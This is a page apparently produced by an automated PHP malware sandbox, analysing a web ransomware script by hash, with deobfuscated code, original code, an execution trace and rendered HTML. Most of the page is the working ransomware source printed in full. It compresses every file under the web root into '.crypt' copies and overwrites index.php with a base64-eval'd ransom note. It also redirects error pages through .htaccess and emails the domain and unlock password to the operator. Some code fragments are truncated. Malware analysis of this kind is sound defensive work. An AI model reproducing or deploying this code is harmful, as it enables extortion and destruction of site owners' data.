PHP Malware Analysis


md5: ee88ea8dfb02b517026bedabac2d3393

Deobfuscated PHP code

<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="">
<link rel="stylesheet" href="">
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("");
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
:-webkit-full-screen {
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
ini_set('memory_limit', '-1');
if (isset($_POST['pass'])) {
    function encfile($filename)
        if (strpos($filename, '.crypt') !== false) {
        file_put_contents($filename . ".crypt", gzdeflate(file_get_contents($filename), 9));
        copy('.htaccess', '.htabackup');
        $file = "<title>Ransomware</title>\n     <meta charset='utf-8'/>\n<meta content='IE=edge' http-equiv='X-UA-Compatible'/>\n<meta name=\"theme-color\"content=\"black\">\n<meta name=\"description\"content=\"hacked by \">\n<script src=\"\" type=\"text/javascript\"></script>\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\" />\n        <meta property=\"og:image\" content=\"\">\n        \n<link rel=\"stylesheet\" href=\"\">\n<style>\nbody { \t \ndisplay: flex;\n  align-items: center;\n  justify-content: center;\n  min-height: 100vh;\nbackground-image: url(\"\");\ncolor:pink;\n    height:100%;\n    background-position: center;\n    background-repeat: no-repeat;\nbackground-size: 100% 100%;\nbackground-attachment:fixed;} \t\nbtnn{\nalign-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\n}\n</style>\n<font color=\"pink\">\n<?php\nerror_reporting(0);\n\$input = \$_POST['pass'];\n\$pass = \"gomen\";\nif(isset(\$input)) {\nif(md5(\$input) == \$pass) {\nfunction decfile(\$filename){\n\tif (strpos(\$filename, '.crypt') === FALSE) {\n\treturn;\n\t}\n\t\$decrypted = gzinflate(file_get_contents(\$filename));\n\tfile_put_contents(str_replace('.crypt', '', \$filename), \$decrypted);\n\tunlink('crypt.php');\n\tunlink('.htaccess');\n\tunlink(\$filename);\n\techo \"\$filename Decrypted !!!<br>\";\n}\n\nfunction decdir(\$dir){\n\t\$files = array_diff(scandir(\$dir), array('.', '..'));\n\t\tforeach(\$files as \$file) {\n\t\t\tif(is_dir(\$dir.\"/\".\$file)){\n\t\t\t\tdecdir(\$dir.\"/\".\$file);\n\t\t\t}else {\n\t\t\t\tdecfile(\$dir.\"/\".\$file);\n\t\t}\n\t}\n}\n\ndecdir(\$_SERVER['DOCUMENT_ROOT']);\necho \"<br>Webroot Decrypted<br>\";\nunlink(\$_SERVER['PHP_SELF']);\nunlink('.htaccess');\ncopy('htabackup','.htaccess');\necho 'Success !!!';\n} else {\necho 'Failed Password !!!';\n}\nexit();\n}\n?>\n<center>\n<h1>Ransomware</h1>\n<br><br>\n<h3>Your Website Is Encrypted</h3>\n\n\nDon't Change the Filename because it Can Damage the File If You Want to Return You Must Enter the Password First\n<br>\nSend Me \$3 For Back Your Website <br><br>\n<br><br>\n<form enctype=\"multipart/form-data\" method=\"post\">\n    <br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: cover;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"text\" name=\"pass\" placeholder=\"Password\">\n<br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"submit\" value=\"Decrypt\">\n    <br>\n       <center>\n<br>\n<audio id=\"myAudio\" loop=\"1\">\n            <source src=\"\n\" type=\"audio/ogg\">\n            <source src=\"\n\" type=\"audio/mpeg\">\n        </audio>\n        <button onclick=\"playAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"button\">Play</button>       <button onclick=\"pauseAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"button\">Pause</button></center>\n        <script>\n              var x = document.getElementById(\"myAudio\"); \n\n              function playAudio() { \n        ; \n              } \n\n               function pauseAudio() { \n                  x.pause(); \n              } \n        </script>\n</form>\n<br>Contact Mail : [email protected]\n</font>";
        $q = str_replace('gomen', md5($_POST['pass']), $file);
        $w = str_replace('[email protected]', $_POST['email'], $q);
        $e = str_replace('hello', $_POST['btc'], $w);
        $r = str_replace('$3', '$' . $_POST['price'], $e);
        $dec = $r;
        $comp = "<?php eval('?>'.base64_decode('" . base64_encode($dec) . "'" . ").'<?php '); ?>";
        $hii = fopen('index.php', 'w');
        fwrite($hii, $comp);
        $hta = "DirectoryIndex index.php\n\r\nErrorDocument 403 /index.php\n\r\nErrorDocument 404 /index.php\n\r\nErrorDocument 500 /index.php\n";
        $ht = fopen('.htaccess', 'w');
        fwrite($ht, $hta);
        echo "{$filename} Encrypted !!!<br>";
    function encdir($dir)
        $files = array_diff(scandir($dir), array('.', '..'));
        foreach ($files as $file) {
            if (is_dir($dir . "/" . $file)) {
                encdir($dir . "/" . $file);
            } else {
                encfile($dir . "/" . $file);
    if (isset($_POST['pass'])) {
    copy('index.php', $_SERVER['DOCUMENT_ROOT'] . '/index.php');
    copy('.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htaccess');
    copy($_SERVER['DOCUMENT_ROOT'] . '.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htabackup');
    $to = $_POST['[email protected]'];
    $subject = 'Your Ransomware Info';
    $message = "Domain : " . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n\n" . "Your Password : " . $_POST['pass'];
    if (mail($to, $subject, $message)) {
        echo "The password has been sent to your email";
    } else {
        echo "password was not sent to your email";
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
<br><br><h3>Information :</h3>
Path File : <font color="red"><?php 
Mail Function : <font color="red"><?php 
if (mail('[email protected]', 'tes', 'tes')) {
    echo "ON";
} else {
    echo "OFF";
<form enctype="multipart/form-data" method="post">
<input type="text" name="pass" placeholder="Input Password" >
<input type="text" name="email" placeholder="Your Email" >
<input type="text" name="price" placeholder="Price Decrypt" >
<input type="submit" class="input" value="Lock Site">

Execution traces

Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:57:47.426670]
1	0	1	0.000164	393528
1	3	0	0.000371	430072	{main}	1		/var/www/html/uploads/ransomware.php	0	0
2	4	0	0.000392	430072	error_reporting	0		/var/www/html/uploads/ransomware.php	36	1	0
2	4	1	0.000408	430112
2	4	R			22527
2	5	0	0.000421	430072	set_time_limit	0		/var/www/html/uploads/ransomware.php	37	1	0
2	5	1	0.000437	430136
2	5	R			FALSE
2	6	0	0.000450	430104	ini_set	0		/var/www/html/uploads/ransomware.php	38	2	'memory_limit'	'-1'
2	6	1	0.000465	430208
2	6	R			'128M'
2	7	0	0.000480	430104	ini_set	0		/var/www/html/uploads/ransomware.php	98	2	'output_buffering'	0
2	7	1	0.000495	430176
2	7	R			FALSE
2	8	0	0.000508	430104	ini_set	0		/var/www/html/uploads/ransomware.php	98	2	'display_errors'	0
2	8	1	0.000523	430176
2	8	R			''
2	9	0	0.000535	430104	set_time_limit	0		/var/www/html/uploads/ransomware.php	98	1	0
2	9	1	0.000548	430136
2	9	R			FALSE
2	10	0	0.000561	430104	ini_set	0		/var/www/html/uploads/ransomware.php	98	2	'memory_limit'	'64M'
2	10	1	0.000574	430208
2	10	R			'-1'
2	11	0	0.000587	430104	header	0		/var/www/html/uploads/ransomware.php	98	1	'Content-Type: text/html; charset=UTF-8'
2	11	1	0.000604	430280
2	11	R			NULL
2	12	0	0.000618	430248	mail	0		/var/www/html/uploads/ransomware.php	106	3	'[email protected]'	'tes'	'tes'
2	12	1	0.001662	430344
2	12	R			FALSE
1	3	1	0.001695	430248
			0.001735	336616
TRACE END   [2023-02-12 21:57:47.428273]

Generated HTML code

<meta charset="utf-8">
<meta content="IE=edge" http-equiv="X-UA-Compatible">
<meta name="theme-color" content="black">
<meta name="description" content="Ransomware">
<script src="" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta property="og:image" content=";usqp=CAU">
<link rel="stylesheet" href="">
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("");
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
:-webkit-full-screen {
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
<br><br><h3>Information :</h3>
Path File : <font color="red">/var/www/html/ransomware.php</font><br>
Mail Function : <font color="red">OFF</font>
<form enctype="multipart/form-data" method="post">
<input type="text" name="pass" placeholder="Input Password">
<input type="text" name="email" placeholder="Your Email">
<input type="text" name="price" placeholder="Price Decrypt">
<input type="submit" class="input" value="Lock Site">
Original PHP code

<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="">
<link rel="stylesheet" href="">
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("");
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
:-webkit-full-screen {
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
ini_set('memory_limit', '-1');
if(isset($_POST['pass'])) {
function encfile($filename){
	if (strpos($filename, '.crypt') !== false) {
	file_put_contents($filename.".crypt", gzdeflate(file_get_contents($filename), 9));
$file = base64_decode("PHRpdGxlPlJhbnNvbXdhcmU8L3RpdGxlPgogICAgIDxtZXRhIGNoYXJzZXQ9J3V0Zi04Jy8+CjxtZXRhIGNvbnRlbnQ9J0lFPWVkZ2UnIGh0dHAtZXF1aXY9J1gtVUEtQ29tcGF0aWJsZScvPgo8bWV0YSBuYW1lPSJ0aGVtZS1jb2xvciJjb250ZW50PSJibGFjayI+CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uImNvbnRlbnQ9ImhhY2tlZCBieSAiPgo8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG4ucmF3Z2l0LmNvbS9idW5nZnJhbmdraS9lZmVrc2FsanUvMmE3ODA1YzcvZWZlay1zYWxqdS5qcyIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48L3NjcmlwdD4KICAgICAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iIC8+CiAgICAgICAgPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwczovL2VuY3J5cHRlZC10Ym4wLmdzdGF0aWMuY29tL2ltYWdlcz9xPXRibjpBTmQ5R2NUSGlGSHNlWER6M0x3S1VHYmdpV2tLcTBBcXJ0azBYNmExVncmdXNxcD1DQVUiPgogICAgICAgIAo8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2ZvbnQtYXdlc29tZS80LjcuMC9jc3MvZm9udC1hd2Vzb21lLm1pbi5jc3MiPgo8c3R5bGU+CmJvZHkgeyAJIApkaXNwbGF5OiBmbGV4OwogIGFsaWduLWl0ZW1zOiBjZW50ZXI7CiAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7CiAgbWluLWhlaWdodDogMTAwdmg7CmJhY2tncm91bmQtaW1hZ2U6IHVybCgiaHR0cHM6Ly9jZG4ucHJpbnNoLmNvbS9kYXRhLTEvaW1hZ2VzL05hdGhhblByaW5zbGV5LXJhaW4tc2FkLmdpZiIpOwpjb2xvcjpwaW5rOwogICAgaGVpZ2h0OjEwMCU7CiAgICBiYWNrZ3JvdW5kLXBvc2l0aW9uOiBjZW50ZXI7CiAgICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwpiYWNrZ3JvdW5kLXNpemU6IDEwMCUgMTAwJTsKYmFja2dyb3VuZC1hdHRhY2htZW50OmZpeGVkO30gCQpidG5uewphbGlnbi1pdGVtczogY2VudGVyOwogICAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsKICAgIGJvcmRlcjogMXB4IHNvbGlkIGdyZWVuOwogICAgbGV0dGVyLXNwYWNpbmc6IDBweDsKICAgIGNvbG9yOiByZWQ7CiAgICB3aWR0aDogNjBweDsKICAgIGhlaWdodDogMjVweDsKICAgIHBhZGRpbmc6IDA7CiAgICBmb250LXNpemU6IDE1cHg7CiAgICBmb250LXdlaWdodDogYm9sZDsKfQo8L3N0eWxlPgo8Zm9udCBjb2xvcj0icGluayI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGlucHV0ID0gJF9QT1NUWydwYXNzJ107CiRwYXNzID0gImdvbWVuIjsKaWYoaXNzZXQoJGlucHV0KSkgewppZihtZDUoJGlucHV0KSA9PSAkcGFzcykgewpmdW5jdGlvbiBkZWNmaWxlKCRmaWxlbmFtZSl7CglpZiAoc3RycG9zKCRmaWxlbmFtZSwgJy5jcnlwdCcpID09PSBGQUxTRSkgewoJcmV0dXJuOwoJfQoJJGRlY3J5cHRlZCA9IGd6aW5mbGF0ZShmaWxlX2dldF9jb250ZW50cygkZmlsZW5hbWUpKTsKCWZpbGVfcHV0X2NvbnRlbnRzKHN0cl9yZXBsYWNlKCcuY3J5cHQnLCAnJywgJGZpbGVuYW1lKSwgJGRlY3J5cHRlZCk7Cgl1bmxpbmsoJ2NyeXB0LnBocCcpOwoJdW5saW5rKCcuaHRhY2Nlc3MnKTsKCXVubGluaygkZmlsZW5hbWUpOwoJZWNobyAiJGZpbGVuYW1lIERlY3J5cHRlZCAhISE8YnI+IjsKfQoKZnVuY3Rpb24gZGVjZGlyKCRkaXIpewoJJGZpbGVzID0gYXJyYXlfZGlmZihzY2FuZGlyKCRkaXIpLCBhcnJheSgnLicsICcuLicpKTsKCQlmb3JlYWNoKCRmaWxlcyBhcyAkZmlsZSkgewoJCQlpZihpc19kaXIoJGRpci4iLyIuJGZpbGUpKXsKCQkJCWRlY2RpcigkZGlyLiIvIi4kZmlsZSk7CgkJCX1lbHNlIHsKCQkJCWRlY2ZpbGUoJGRpci4iLyIuJGZpbGUpOwoJCX0KCX0KfQoKZGVjZGlyKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10pOwplY2hvICI8YnI+V2Vicm9vdCBEZWNyeXB0ZWQ8YnI+IjsKdW5saW5rKCRfU0VSVkVSWydQSFBfU0VMRiddKTsKdW5saW5rKCcuaHRhY2Nlc3MnKTsKY29weSgnaHRhYmFja3VwJywnLmh0YWNjZXNzJyk7CmVjaG8gJ1N1Y2Nlc3MgISEhJzsKfSBlbHNlIHsKZWNobyAnRmFpbGVkIFBhc3N3b3JkICEhISc7Cn0KZXhpdCgpOwp9Cj8+CjxjZW50ZXI+CjxoMT5SYW5zb213YXJlPC9oMT4KPGJyPjxicj4KPGgzPllvdXIgV2Vic2l0ZSBJcyBFbmNyeXB0ZWQ8L2gzPgoKCkRvbid0IENoYW5nZSB0aGUgRmlsZW5hbWUgYmVjYXVzZSBpdCBDYW4gRGFtYWdlIHRoZSBGaWxlIElmIFlvdSBXYW50IHRvIFJldHVybiBZb3UgTXVzdCBFbnRlciB0aGUgUGFzc3dvcmQgRmlyc3QKPGJyPgpTZW5kIE1lICQzIEZvciBCYWNrIFlvdXIgV2Vic2l0ZSA8YnI+PGJyPgo8YnI+PGJyPgo8Zm9ybSBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9InBvc3QiPgogICAgPGJyPgo8aW5wdXQgc3R5bGU9ImFsaWduLWl0ZW1zOiBjZW50ZXI7CiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsKICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsKICAgIGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OwogICAgYm9yZGVyOiAxcHggc29saWQgZ3JlZW47CiAgICBsZXR0ZXItc3BhY2luZzogMHB4OwogICAgY29sb3I6IHJlZDsKICAgIHdpZHRoOiBjb3ZlcjsKICAgIGhlaWdodDogMjVweDsKICAgIHBhZGRpbmc6IDA7CiAgICBmb250LXNpemU6IDE1cHg7CiAgICBmb250LXdlaWdodDogYm9sZDsiIHR5cGU9InRleHQiIG5hbWU9InBhc3MiIHBsYWNlaG9sZGVyPSJQYXNzd29yZCI+Cjxicj4KPGlucHV0IHN0eWxlPSJhbGlnbi1pdGVtczogY2VudGVyOwogICAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsKICAgIGJvcmRlcjogMXB4IHNvbGlkIGdyZWVuOwogICAgbGV0dGVyLXNwYWNpbmc6IDBweDsKICAgIGNvbG9yOiByZWQ7CiAgICB3aWR0aDogNjBweDsKICAgIGhlaWdodDogMjVweDsKICAgIHBhZGRpbmc6IDA7CiAgICBmb250LXNpemU6IDE1cHg7CiAgICBmb250LXdlaWdodDogYm9sZDsiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkRlY3J5cHQiPgogICAgPGJyPgogICAgICAgPGNlbnRlcj4KPGJyPgo8YXVkaW8gaWQ9Im15QXVkaW8iIGxvb3A9IjEiPgogICAgICAgICAgICA8c291cmNlIHNyYz0iCmh0dHBzOi8vai50b3A0dG9wLmlvL21fMjI5N2RkbGZ3MC5tcDMiIHR5cGU9ImF1ZGlvL29nZyI+CiAgICAgICAgICAgIDxzb3VyY2Ugc3JjPSIKaHR0cHM6Ly9qLnRvcDR0b3AuaW8vbV8yMjk3ZGRsZncwLm1wMyIgdHlwZT0iYXVkaW8vbXBlZyI+CiAgICAgICAgPC9hdWRpbz4KICAgICAgICA8YnV0dG9uIG9uY2xpY2s9InBsYXlBdWRpbygpIiBzdHlsZT0iYWxpZ24taXRlbXM6IGNlbnRlcjsKICAgIGp1c3RpZnktY29udGVudDogY2VudGVyOwogICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgYmFja2dyb3VuZDogdHJhbnNwYXJlbnQ7CiAgICBib3JkZXI6IDFweCBzb2xpZCBncmVlbjsKICAgIGxldHRlci1zcGFjaW5nOiAwcHg7CiAgICBjb2xvcjogcmVkOwogICAgd2lkdGg6IDYwcHg7CiAgICBoZWlnaHQ6IDI1cHg7CiAgICBwYWRkaW5nOiAwOwogICAgZm9udC1zaXplOiAxNXB4OwogICAgZm9udC13ZWlnaHQ6IGJvbGQ7IiB0eXBlPSJidXR0b24iPlBsYXk8L2J1dHRvbj4gICAgICAgPGJ1dHRvbiBvbmNsaWNrPSJwYXVzZUF1ZGlvKCkiIHN0eWxlPSJhbGlnbi1pdGVtczogY2VudGVyOwogICAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsKICAgIGJvcmRlcjogMXB4IHNvbGlkIGdyZWVuOwogICAgbGV0dGVyLXNwYWNpbmc6IDBweDsKICAgIGNvbG9yOiByZWQ7CiAgICB3aWR0aDogNjBweDsKICAgIGhlaWdodDogMjVweDsKICAgIHBhZGRpbmc6IDA7CiAgICBmb250LXNpemU6IDE1cHg7CiAgICBmb250LXdlaWdodDogYm9sZDsiIHR5cGU9ImJ1dHRvbiI+UGF1c2U8L2J1dHRvbj48L2NlbnRlcj4KICAgICAgICA8c2NyaXB0PgogICAgICAgICAgICAgIHZhciB4ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIm15QXVkaW8iKTsgCgogICAgICAgICAgICAgIGZ1bmN0aW9uIHBsYXlBdWRpbygpIHsgCiAgICAgICAgICAgICAgICAgIHgucGxheSgpOyAKICAgICAgICAgICAgICB9IAoKICAgICAgICAgICAgICAgZnVuY3Rpb24gcGF1c2VBdWRpbygpIHsgCiAgICAgICAgICAgICAgICAgIHgucGF1c2UoKTsgCiAgICAgICAgICAgICAgfSAKICAgICAgICA8L3NjcmlwdD4KPC9mb3JtPgo8YnI+Q29udGFjdCBNYWlsIDogd2Fubjc4N3ZpcEBnbWFpbC5jb20KPC9mb250Pg==");
$q = str_replace('gomen', md5($_POST['pass']), $file);
$w = str_replace('[email protected]', $_POST['email'], $q);
$e = str_replace('hello', $_POST['btc'], $w);
$r = str_replace('$3', '$'.$_POST['price'], $e);
$dec = $r;
$comp = "<?php eval('?>'.base64_decode("."'".base64_encode($dec)."'".").'<?php '); ?>";
$hii = fopen('index.php', 'w');
fwrite($hii, $comp);
$hta = "DirectoryIndex index.php\n
ErrorDocument 403 /index.php\n
ErrorDocument 404 /index.php\n
ErrorDocument 500 /index.php\n";
$ht = fopen('.htaccess', 'w');
fwrite($ht, $hta);
echo "$filename Encrypted !!!<br>";

function encdir($dir){
	$files = array_diff(scandir($dir), array('.', '..'));
		foreach($files as $file) {
			} else {

copy('index.php', $_SERVER['DOCUMENT_ROOT'].'/index.php');
copy('.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htaccess');
copy($_SERVER['DOCUMENT_ROOT'].'.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htabackup');
$to = $_POST['[email protected]'];
$subject = 'Your Ransomware Info';
$message = "Domain : ".$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI']."\n\n"."Your Password : ".$_POST['pass'];
if(mail($to,$subject,$message)) {
echo 'The password has been sent to your email';
} else {
echo 'password was not sent to your email';
@ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8');

<br><br><h3>Information :</h3>
Path File : <font color="red"><?php echo $_SERVER['SCRIPT_FILENAME'] ; ?></font><br>
Mail Function : <font color="red"><?php if(mail('[email protected]','tes','tes')) { echo "ON"; } else { echo "OFF"; } ?></font>
<form enctype="multipart/form-data" method="post">
<input type="text" name="pass" placeholder="Input Password" >
<input type="text" name="email" placeholder="Your Email" >
<input type="text" name="price" placeholder="Price Decrypt" >
<input type="submit" class="input" value="Lock Site">